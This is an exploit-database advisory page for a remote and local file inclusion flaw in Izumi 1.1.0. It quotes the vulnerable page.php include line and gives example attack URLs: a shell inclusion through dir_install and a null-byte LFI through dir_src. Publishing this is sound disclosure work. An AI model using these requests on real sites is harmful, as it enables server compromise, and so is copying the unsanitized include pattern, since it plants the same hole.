Izumi - exploit.company

vendor:

Izumi

by:

cr4wl3r

8,8

CVSS

HIGH

Remote File Inclusion (RFI) and Local File Inclusion (LFI)

CWE

Product Name: Izumi

Affected Version From: 1.1.0

Affected Version To: 1.1.0

Patch Exists: YES

Related CWE: N/A

CPE: a:izumi:izumi

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Izumi <= 1.1.0 (RFI/LFI) Multiple Include Vulnerability

Izumi version 1.1.0 and below is vulnerable to Remote File Inclusion (RFI) and Local File Inclusion (LFI) attacks. The vulnerability exists in the page.php file, which allows an attacker to include malicious files from remote or local sources. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing a malicious file path in the dir_install and dir_src parameters.

Mitigation:

Upgrade to the latest version of Izumi, which is not vulnerable to this attack.

Source

Exploit-DB raw data:

##################################################################
[+] Izumi <= 1.1.0 (RFI/LFI) Multiple Include Vulnerability
[+] Discovered by cr4wl3r <cr4wl3r[!]linuxmail.org>
[+] Download : http://sourceforge.net/projects/izumi/files/
##################################################################

[+] Code :

##################################################################
[page.php]

require_once($dir_install . $dir_src . "common.php");
##################################################################

[+] Example :

##################################################################
[x] RFI :

  [Izumi_path]/src/page.php?dir_install=[Shell]

[x] LFI :

  [Izumi_path]/src/page.php?dir_src=[LFI%00]


[+] GreetZ : s3luruh 4n4k n4k4l j4l4n4n g0r0nt4l0    


[+] Note : Brb ngakak dolo. Wkwkwkwkwkwkwk
##################################################################